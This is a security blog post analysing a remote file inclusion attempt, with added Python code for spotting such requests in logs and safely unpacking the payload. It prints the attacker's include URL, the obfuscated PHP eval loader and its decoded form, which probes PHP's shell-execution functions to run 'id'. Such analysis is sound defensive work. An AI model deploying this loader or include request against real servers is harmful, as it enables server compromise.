1337 v0pCr3w – heh

Posted on 11 May 2009

Well, I thought this to be a humorous find in the webserver logs on a Monday afternoon.

It was a remote file inclusion attempt: a request to the Aanval.com primary domain trying to get the server to fetch and execute the following URL:

http://oubkhammuseum.com/templates/idvop.txt
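For anyone who wants to pull attempts like this out of their own access logs, here is an added example (not code from this post or from Aanval) that parses Apache common/combined log lines and flags query-string values that are absolute URLs to a third-party host. It rates a hit "high" when the value has the classic include shape (a .txt/.php style path, a trailing `?` used to cut off the rest of the include path, or an embedded null byte) and "low" when it is merely an external URL. The log lines are constructed: the first reuses the IP and URL from this post, but its request path, parameter name and timestamp are assumptions, as is the self-hostname `aanval.com`.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log prefix (constructed regex, enough for the fields used here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
# Extensions commonly given to dropped include files; .txt is what this post saw.
SHELL_EXTS = (".txt", ".php", ".gif", ".jpg", ".dat")


def classify_value(value, self_host):
    """Return 'high', 'low' or None for one query-string value (already percent-decoded)."""
    v = value.strip()
    try:
        u = urlsplit(v)
    except ValueError:
        return None                      # malformed netloc, not something include() would fetch
    if u.scheme.lower() not in REMOTE_SCHEMES or not u.hostname:
        return None                      # not an absolute URL to some host
    if u.hostname.lower() == self_host.lower():
        return None                      # links back to ourselves are common and benign
    if u.path.lower().endswith(SHELL_EXTS) or v.endswith("?") or "\x00" in v:
        return "high"                    # page=http://host/shell.txt? is the classic RFI shape
    return "low"                         # external URL in a parameter; may be legitimate


def scan_log(text, self_host):
    """Parse access-log lines and return one finding per suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so %68%74%74%70 comes back as "http"
        for name, value in parse_qsl(query, keep_blank_values=True):
            level = classify_value(value, self_host)
            if level:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "param": name, "url": value, "level": level})
    return findings


# Constructed sample log. Line 1 reuses the IP and URL from this post; its request path,
# parameter name and timestamp are assumptions. The other lines are invented traffic.
SAMPLE_LOG = """\
208.112.87.9 - - [11/May/2009:14:02:11 -0500] "GET /index.php?page=http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 200 5120
10.0.0.5 - - [11/May/2009:14:02:12 -0500] "GET /index.php?page=about HTTP/1.1" 200 4311
10.0.0.7 - - [11/May/2009:14:03:40 -0500] "GET /search?q=https://www.example.org/docs HTTP/1.1" 200 812
203.0.113.9 - - [11/May/2009:14:05:02 -0500] "GET /wp-content/plugins/x.php?cfg=%68%74%74%70://198.51.100.20/s.txt HTTP/1.0" 404 209
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, "aanval.com"):
        print(f"{f['level']:4} {f['ip']:15} {f['param']}={f['url']}")
```

The "low" bucket exists because search boxes and redirect parameters legitimately carry URLs; the "high" bucket is the one worth paging on, and a 200 response to such a request (as on the first sample line) is the case to check by hand, since it means the script at that path did not reject the parameter outright.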

The content of the URL (in the event it gets pulled):

[code lang="php"]$vopcrew = "pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQg
TJF8/b7mH5/L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0OgdMHJxtTF8spnIjstn
DKaxDkJ2cGnLYQOduonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMoLD4Bv43SjH52bTaOvk
eNYw2IFdQ1v2BCjPyiD4VhQ/booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9SLokosaCs1hrHk
LUUrZ7urS0fz32lwh90TTTAEskQHRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9EbWh+
v2trypbkGMqK2mCgx9VeseA6q3AoKL8=";
eval(gzinflate(str_rot13(base64_decode($vopcrew))));
exit;[/code]
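To see what a blob like that contains without ever running it, here is an added example (not part of the original post) that replays the gzinflate(str_rot13(base64_decode())) chain in Python and simply leaves the eval out. It goes one step beyond what this file shows: packed payloads are often wrapped in the same loader several times, so `peel()` keeps unpacking while it finds the pattern. The PHP it packs and unpacks is a constructed stand-in for the real payload, and the `$vopcrew` variable name in `wrap()` is assumed from the file above; paste the blob from the post into `unpack_vopcrew()` to recover the listing that follows.

```python
import base64
import re
import zlib


def php_str_rot13(data: bytes) -> bytes:
    """Byte-wise equivalent of PHP str_rot13(): rotates ASCII letters only, leaves other bytes alone."""
    table = bytearray(range(256))
    for base in (ord("a"), ord("A")):
        for i in range(26):
            table[base + i] = base + (i + 13) % 26
    return data.translate(bytes(table))


def php_gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE with no zlib/gzip header, hence wbits=-15."""
    return zlib.decompress(data, -15)


def php_gzdeflate(data: bytes) -> bytes:
    """Inverse of gzinflate; used here only to build test fixtures."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


def unpack_vopcrew(blob: str) -> str:
    """gzinflate(str_rot13(base64_decode($blob))) with the eval() left out."""
    raw = base64.b64decode("".join(blob.split()))      # tolerate the line-wrapped blob from the post
    return php_gzinflate(php_str_rot13(raw)).decode("utf-8", errors="replace")


def pack_vopcrew(php: str) -> str:
    """Builds a blob the same way the loader expects (test fixture only)."""
    return base64.b64encode(php_str_rot13(php_gzdeflate(php.encode()))).decode()


def wrap(php: str) -> str:
    """Wraps PHP in the same loader stub as the file above (assumed variable name $vopcrew)."""
    return ('$vopcrew = "%s";\n'
            'eval(gzinflate(str_rot13(base64_decode($vopcrew))));\n'
            'exit;' % pack_vopcrew(php))


# $name = "base64..."; assignments, and the eval() call that consumes one of them
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*["\']([A-Za-z0-9+/=\s]*)["\']\s*;')
EVAL_RE = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*\)\s*\)\s*\)'
)


def peel(php: str, max_layers: int = 10):
    """Repeatedly unpacks this loader pattern; returns (plaintext, number of layers removed)."""
    layers = 0
    while layers < max_layers:
        m = EVAL_RE.search(php)
        if not m:
            break
        blobs = dict(ASSIGN_RE.findall(php))
        if m.group(1) not in blobs:
            break                                       # eval of something we cannot resolve statically
        php = unpack_vopcrew(blobs[m.group(1)])
        layers += 1
    return php, layers


SAMPLE_PHP = 'echo "v0pCr3w"; echo "os:" . PHP_OS;'   # constructed stand-in for the real payload

if __name__ == "__main__":
    plain, n = peel(wrap(wrap(SAMPLE_PHP)))
    print(f"{n} layer(s) removed:\n{plain}")
```

The ordering matters: PHP applies the innermost call first, so decoding is base64, then rot13, then inflate, and rot13 here is applied to the binary output of base64_decode, not to the text, which is why the helper works on bytes. The whole point of the triple wrapping is that nothing in the file matches a grep for `exec` or `system`; the decode is what gives you something to grep.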

And of course, the decoded PHP version that they would prefer to have executed:

[code lang="php"]$os = @PHP_OS;
echo "v0pCr3w";          // banner: a successful include is easy to spot in the response
echo "os:$os";
$cmd="id";               // the only command run: find out which user PHP executes as
$eseguicmd=ex($cmd);
echo $eseguicmd;

// Try every way PHP can run a shell command, in order, until one is available.
function ex($cfe){

    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}[/code]

Essentially, it is an attempt to identify the user the web server process runs as. The ex() function is a simple if / elseif chain that tries each of the usual PHP shell primitives in turn (exec, shell_exec, system, passthru and finally popen) and runs "id" through the first one that exists. Since function_exists() reports a function disabled through disable_functions as absent, blocking only one of them just sends the loader on to the next. The echoed "v0pCr3w" banner, OS name and command output then make a successful include easy to pick out of the HTTP response.

A quick search around the net turned up the little Perl scanner tool used:

http://www.loyalmoses.com/junk/vopcrew_multiscanner.txt

The offending IP apparently belongs to HostMySite, which owns a good-sized net block:

208.112.87.9

OrgName: HostMySite
Address: 650 Pencader Drive
City: Newark
StateProv: DE
PostalCode: 19702
Country: US

Rather amateurish, but effective. 😉


1 Response to 1337 v0pCr3w – heh

  • gigi says:

    Hi,
    I have got the same problem, but does this mean that they have tried to download that file onto my server, or have they verified that it was already on my server?

    Regards
    Gigi

    Copyright © Loyal Moses